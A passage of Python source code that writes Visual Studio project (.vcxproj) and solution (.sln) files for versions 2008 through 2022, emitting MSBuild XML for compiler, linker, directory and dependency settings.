'\'{0:s}|{1:s}\'">$(Configuration)\\</IntDir>').format(
project_configuration.name, project_configuration.platform))
else:
self.WriteLine((
' <IntDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(Configuration)\\$(Platform)\\</IntDir>').format(
project_configuration.name, project_configuration.platform))
def _WriteOutIntDirPropertyGroups(self, project_configurations):
"""Writes the OutDir and IntDir property groups.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLines([
' <PropertyGroup>',
' <_ProjectFileVersion>{0:s}</_ProjectFileVersion>'.format(
self._project_file_version)])
# Mimic Visual Studio behavior and output the configurations
# in platforms by name.
for configuration_name in sorted(project_configurations.names):
self._WriteOutIntDirConditions(configuration_name, project_configurations)
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if project_configuration.link_incremental != '':
self.WriteLine((
' <LinkIncremental Condition="\'$(Configuration)|'
'$(Platform)\'==\'{0:s}|{1:s}\'">{2:s}</LinkIncremental>').format(
project_configuration.name, project_configuration.platform,
project_configuration.link_incremental_string))
self.WriteLine(' </PropertyGroup>')
def _WriteResourceFiles(self, resource_files):
"""Writes the resource files.
Args:
resource_files (list[str]): resource filenames.
"""
if resource_files:
self.WriteLine(' <ItemGroup>')
for filename in resource_files:
self.WriteLine(' <ResourceCompile Include="{0:s}" />'.format(
filename))
self.WriteLine(' </ItemGroup>')
def _WriteSourceFiles(self, source_files):
"""Writes the source files.
Args:
source_files (list[str]): source filenames.
"""
if source_files:
self.WriteLine(' <ItemGroup>')
for filename in source_files:
self.WriteLine(' <ClCompile Include="{0:s}" />'.format(filename))
self.WriteLine(' </ItemGroup>')
def WriteConfigurations(self, project_configurations):
"""Writes the configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine(
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.Default.props" />')
# Mimic Visual Studio behavior and output the configurations
# in reverse order of name.
for project_configuration in project_configurations.GetSorted(reverse=True):
self._WriteConfigurationPropertyGroup(project_configuration)
self.WriteLines([
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.props" />',
' <ImportGroup Label="ExtensionSettings">',
' </ImportGroup>'])
# Mimic Visual Studio behavior and output the configurations
# in reverse of name.
for project_configuration in project_configurations.GetSorted(reverse=True):
self.WriteLines([
(' <ImportGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'" Label="PropertySheets">'.format(
project_configuration.name, project_configuration.platform)),
(' <Import Project="$(UserRootDir)\\Microsoft.Cpp.$(Platform)'
'.user.props" Condition="exists(\'$(UserRootDir)\\Microsoft.Cpp'
'.$(Platform).user.props\')" Label="LocalAppDataPlatform" />'),
' </ImportGroup>'])
self.WriteLine(' <PropertyGroup Label="UserMacros" />')
self._WriteOutIntDirPropertyGroups(project_configurations)
for project_configuration in project_configurations.GetSorted():
self._WriteItemDefinitionGroup(project_configuration)
def WriteDependencies(self, dependencies, solution_projects_by_guid):
"""Writes the dependencies.
Args:
dependencies (list[str]): GUIDs of the dependencies.
solution_projects_by_guid (dict[str, VSSolutionProject]): projects
per lower case GUID.
"""
if dependencies:
self.WriteLine(' <ItemGroup>')
dependencies_by_name = {}
# Mimic Visual Studio behavior and output the dependencies in order
# of name (perhaps filename?).
for dependency_guid in dependencies:
dependency_project = solution_projects_by_guid[dependency_guid]
dependencies_by_name[dependency_project.name] = dependency_project
for dependency_name in sorted(dependencies_by_name):
dependency_project = dependencies_by_name[dependency_name]
dependency_filename = '..\\{0:s}.vcxproj'.format(
dependency_project.filename)
dependency_guid = dependency_project.guid.lower()
self.WriteLines([
(' <ProjectReference Include="{0:s}">').format(
dependency_filename),
' <Project>{{{0:s}}}</Project>'.format(dependency_guid),
' <ReferenceOutputAssembly>false</ReferenceOutputAssembly>',
' </ProjectReference>'])
self.WriteLine(' </ItemGroup>')
def WriteFiles(self, source_files, header_files, resource_files):
"""Writes the files.
Args:
source_files (list[str]): source filenames.
header_files (list[str]): header filenames.
resource_files (list[str]): resource filenames.
"""
self._WriteSourceFiles(source_files)
self._WriteHeaderFiles(header_files)
self._WriteResourceFiles(resource_files)
def WriteFooter(self):
"""Writes a file footer."""
self.WriteLines([
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.targets" />',
' <ImportGroup Label="ExtensionTargets">',
' </ImportGroup>'])
# The last line has no \r\n.
self._file.write(b'</Project>')
def WriteHeader(self):
"""Writes a file header."""
self._file.write(b'\xef\xbb\xbf')
self.WriteLines([
'<?xml version="1.0" encoding="utf-8"?>',
('<Project DefaultTargets="Build" ToolsVersion="{0:s}" '
'xmlns="http://schemas.microsoft.com/developer/msbuild/2003">').format(
self._tools_version)])
def WriteProjectConfigurations(self, project_configurations):
"""Writes the project configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine(' <ItemGroup Label="ProjectConfigurations">')
for project_configuration in project_configurations.GetSorted():
self.WriteLine(' <ProjectConfiguration Include="{0:s}|{1:s}">'.format(
project_configuration.name, project_configuration.platform))
self.WriteLine(' <Configuration>{0:s}</Configuration>'.format(
project_configuration.name))
self.WriteLine(' <Platform>{0:s}</Platform>'.format(
project_configuration.platform))
self.WriteLine(' </ProjectConfiguration>')
self.WriteLine(' </ItemGroup>')
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLine(' <PropertyGroup Label="Globals">')
self.WriteLine(' <ProjectGuid>{{{0:s}}}</ProjectGuid>'.format(
project_information.guid))
self.WriteLine(' <RootNamespace>{0:s}</RootNamespace>'.format(
project_information.root_name_space))
if project_information.keyword:
self.WriteLine(' <Keyword>{0:s}</Keyword>'.format(
project_information.keyword))
self.WriteLine(' </PropertyGroup>')
class VS2012ProjectFileWriter(VS2010ProjectFileWriter):
"""Visual Studio 2012 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2012ProjectFileWriter, self).__init__()
self._project_file_version = '11.0.61030.0'
self._tools_version = '4.0'
self._version = 2012
def _WriteClCompileSection(self, project_configuration):
"""Writes the CLCompile section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
include_directories = ';'.join(project_configuration.include_directories)
include_directories = re.sub(r'"', r'', include_directories)
if include_directories and include_directories[-1] != ';':
include_directories = '{0:s};'.format(
include_directories)
include_directories = '{0:s}%(AdditionalIncludeDirectories)'.format(
include_directories)
preprocessor_definitions = project_configuration.preprocessor_definitions
if preprocessor_definitions and preprocessor_definitions[-1] != ';':
preprocessor_definitions = '{0:s};'.format(preprocessor_definitions)
preprocessor_definitions = '{0:s}%(PreprocessorDefinitions)'.format(
preprocessor_definitions)
self.WriteLine(' <ClCompile>')
if project_configuration.optimization != '':
self.WriteLine(' <Optimization>{0:s}</Optimization>'.format(
project_configuration.optimization_string))
if project_configuration.enable_intrinsic_functions != '':
self.WriteLine((
' <IntrinsicFunctions>{0:s}</IntrinsicFunctions>').format(
project_configuration.enable_intrinsic_functions))
self.WriteLine((
' <AdditionalIncludeDirectories>{0:s}'
'</AdditionalIncludeDirectories>').format(include_directories))
self.WriteLine((
' <PreprocessorDefinitions>{0:s}'
'</PreprocessorDefinitions>').format(preprocessor_definitions))
if project_configuration.basic_runtime_checks != '':
self.WriteLine((
' <BasicRuntimeChecks>{0:s}'
'</BasicRuntimeChecks>').format(
project_configuration.basic_runtime_checks_string))
if project_configuration.smaller_type_check != '':
self.WriteLine((
' <SmallerTypeCheck>{0:s}</SmallerTypeCheck>').format(
project_configuration.smaller_type_check))
self.WriteLine((
' <RuntimeLibrary>{0:s}</RuntimeLibrary>').format(
project_configuration.runtime_librarian_string))
if project_configuration.enable_function_level_linking != '':
self.WriteLine((
' <FunctionLevelLinking>{0:s}</FunctionLevelLinking>').format(
project_configuration.enable_function_level_linking))
if project_configuration.precompiled_header != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.precompiled_header == '0':
self.WriteLine(' <PrecompiledHeader />')
else:
self.WriteLine((
' <PrecompiledHeader>{0:s}</PrecompiledHeader>').format(
project_configuration.precompiled_header_string))
self.WriteLine(' <WarningLevel>{0:s}</WarningLevel>'.format(
project_configuration.warning_level_string))
if project_configuration.warning_as_error:
self.WriteLine((
' <TreatWarningAsError>{0:s}'
'</TreatWarningAsError>').format(
project_configuration.warning_as_error))
if project_configuration.debug_information_format != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.debug_information_format == '0':
self.WriteLine(' <DebugInformationFormat />')
else:
self.WriteLine((
' <DebugInformationFormat>{0:s}'
'</DebugInformationFormat>').format(
project_configuration.debug_information_format_string))
if project_configuration.compile_as:
self.WriteLine(' <CompileAs>{0:s}</CompileAs>'.format(
project_configuration.compile_as_string))
self.WriteLine(' </ClCompile>')
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
self._WriteConfigurationPropertyGroupFooter()
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteLibrarianSection(self, project_configuration):
"""Writes the librarian section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
librarian_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.librarian_output_file)
self.WriteLines([
' <Lib>',
' <OutputFile>{0:s}</OutputFile>'.format(librarian_output_file)])
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
else:
self.WriteLine(' <ModuleDefinitionFile />')
if project_configuration.librarian_ignore_defaults != '':
self.WriteLine((
' <IgnoreAllDefaultLibraries>{0:s}'
'</IgnoreAllDefaultLibraries>').format(
project_configuration.librarian_ignore_defaults))
self.WriteLine(' </Lib>')
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = (
'{0:s}%(AdditionalDependencies)').format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = (
'{0:s}%(AdditionalLibraryDirectories)').format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLine(' <OptimizeReferences />')
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLine(' <EnableCOMDATFolding />')
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
# A value of 0 is represented by an empty XML tag.
self.WriteLine(' <FixedBaseAddress />')
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.data_execution_prevention == '0':
self.WriteLine(' <DataExecutionPrevention />')
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if (project_configuration.target_machine != '' and
project_configuration.linker_values_set):
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
if project_configuration.linker_values_set:
self.WriteLine(' <LinkIncremental>false</LinkIncremental>')
self.WriteLine(' </PropertyGroup>')
def _WriteOutIntDirPropertyGroups(self, project_configurations):
"""Writes the OutDir and IntDir property groups.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLines([
' <PropertyGroup>',
' <_ProjectFileVersion>{0:s}</_ProjectFileVersion>'.format(
self._project_file_version),
' </PropertyGroup>'])
# Mimic Visual Studio behavior and output the configurations
# in platforms by name.
for configuration_name in sorted(project_configurations.names):
self._WriteOutIntDirConditions(configuration_name, project_configurations)
# for configuration_platform in sorted(project_configurations.platforms):
# project_configuration = project_configurations.GetByIdentifier(
# configuration_name, configuration_platform)
# if project_configuration.link_incremental != '':
# self.WriteLine((
# ' <LinkIncremental Condition="\'$(Configuration)|'
# '$(Platform)\'==\'{0:s}|{1:s}\'">{2:s}'
# '</LinkIncremental>').format(
# project_configuration.name, project_configuration.platform,
# project_configuration.link_incremental_string))
class VS2013ProjectFileWriter(VS2010ProjectFileWriter):
"""Visual Studio 2013 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2013ProjectFileWriter, self).__init__()
self._project_file_version = '12.0.21005.1'
self._tools_version = '12.0'
self._version = 2013
class VS2015ProjectFileWriter(VS2012ProjectFileWriter):
"""Visual Studio 2015 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2015ProjectFileWriter, self).__init__()
self._project_file_version = '14.0.25431.1'
self._tools_version = '14.0'
self._version = 2015
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
self.WriteLine(' </PropertyGroup>')
class VS2017ProjectFileWriter(VS2012ProjectFileWriter):
"""Visual Studio 2017 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2017ProjectFileWriter, self).__init__()
self._project_file_version = '15.0.26730.3'
self._tools_version = '15.0'
self._version = 2017
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = '{0:s}%(AdditionalDependencies)'.format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = '{0:s}%(AdditionalLibraryDirectories)'.format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLines([
' <OptimizeReferences>',
' </OptimizeReferences>'])
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLines([
' <EnableCOMDATFolding>',
' </EnableCOMDATFolding>'])
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
self.WriteLines([
' <FixedBaseAddress>',
' </FixedBaseAddress>'])
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by a new line.
if project_configuration.data_execution_prevention == '0':
self.WriteLines([
' <DataExecutionPrevention>',
' </DataExecutionPrevention>'])
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
if project_configuration.target_machine != '':
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
if project_configuration.output_type != definitions.OUTPUT_TYPE_APPLICATION:
self.WriteLine(
' <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>')
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
if project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION):
self.WriteLine(' <LinkIncremental>false</LinkIncremental>')
self.WriteLine(' </PropertyGroup>')
def WriteHeader(self):
"""Writes a file header."""
self.WriteLines([
'<?xml version="1.0" encoding="utf-8"?>',
('<Project DefaultTargets="Build" ToolsVersion="{0:s}" '
'xmlns="http://schemas.microsoft.com/developer/msbuild/2003">').format(
self._tools_version)])
class VS2019ProjectFileWriter(VS2017ProjectFileWriter):
"""Visual Studio 2019 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2019ProjectFileWriter, self).__init__()
self._project_file_version = '16.0.33423.256'
self._tools_version = '15.0'
self._version = 2019
class VS2022ProjectFileWriter(VS2017ProjectFileWriter):
"""Visual Studio 2022 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2022ProjectFileWriter, self).__init__()
self._project_file_version = '17.0.33516.290'
self._tools_version = 'Current'
self._version = 2022
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
self.WriteLine(' <PlatformToolset>v143</PlatformToolset>')
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
self._WriteConfigurationPropertyGroupFooter()
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLine(' <PropertyGroup Label="Globals">')
self.WriteLine(' <VCProjectVersion>17.0</VCProjectVersion>')
self.WriteLine(' <ProjectGuid>{{{0:s}}}</ProjectGuid>'.format(
project_information.guid))
self.WriteLine(' <RootNamespace>{0:s}</RootNamespace>'.format(
project_information.root_name_space))
if project_information.keyword:
self.WriteLine(' <Keyword>{0:s}</Keyword>'.format(
project_information.keyword))
self.WriteLine(' </PropertyGroup>')
class VSSolutionFileWriter(FileWriter):
"""Visual Studio solution file writer."""
def _WriteProjectConfigurationPlatforms(
self, solution_configurations, solution_projects):
"""Writes the project configuration platforms.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
if solution_configurations.number_of_configurations > 0:
self.WriteLine(
'\tGlobalSection(ProjectConfigurationPlatforms) = postSolution')
for configuration_platform in sorted(solution_configurations.platforms):
for solution_project in solution_projects:
for configuration_name in sorted(solution_configurations.names):
configuration = solution_configurations.GetByIdentifier(
configuration_name, configuration_platform)
self.WriteLine((
'\t\t{{{0:s}}}.{1:s}|{2:s}.ActiveCfg = {1:s}|{2:s}').format(
solution_project.guid.upper(), configuration.name,
configuration.platform))
self.WriteLine((
'\t\t{{{0:s}}}.{1:s}|{2:s}.Build.0 = {1:s}|{2:s}').format(
solution_project.guid.upper(), configuration.name,
configuration.platform))
self.WriteLine('\tEndGlobalSection')
# pylint: disable=unused-argument
def _WriteSolutionConfigurationPlatforms(
self, solution_configurations, solution_projects):
"""Writes the solution configuration platforms.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
if solution_configurations.number_of_configurations > 0:
self.WriteLine(
'\tGlobalSection(SolutionConfigurationPlatforms) = preSolution')
for configuration_platform in sorted(solution_configurations.platforms):
for configuration_name in sorted(solution_configurations.names):
configuration = solution_configurations.GetByIdentifier(
configuration_name, configuration_platform)
self.WriteLine('\t\t{0:s}|{1:s} = {0:s}|{1:s}'.format(
configuration.name, configuration.platform))
self.WriteLine('\tEndGlobalSection')
def _WriteSolutionProperties(self):
"""Writes the solution properties."""
self.WriteLines([
'\tGlobalSection(SolutionProperties) = preSolution',
'\t\tHideSolutionNode = FALSE',
'\tEndGlobalSection'])
@abc.abstractmethod
def WriteHeader(self):
"""Writes a file header."""
@abc.abstractmethod
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
def WriteProjects(self, solution_projects):
"""Writes the projects.
Args:
solution_projects (list[VSSolutionProject]): projects.
"""
for solution_project in solution_projects:
self.WriteProject(solution_project)
class VS2008SolutionFileWriter(VSSolutionFileWriter):
"""Visual Studio 2008 solution file writer."""
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 10.00',
'# Visual C++ Express 2008'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
solution_project_filename = '{0:s}.vcproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
if solution_project.dependencies:
self.WriteLine(
'\tProjectSection(ProjectDependencies) = postProject')
for dependency_guid in solution_project.dependencies:
self.WriteLine('\t\t{{{0:s}}} = {{{0:s}}}'.format(
dependency_guid.upper()))
self.WriteLine('\tEndProjectSection')
self.WriteLine('EndProject')
class VS2010SolutionFileWriter(VSSolutionFileWriter):
"""Visual Studio 2010 solution file writer."""
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 11.00',
'# Visual C++ Express 2010'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
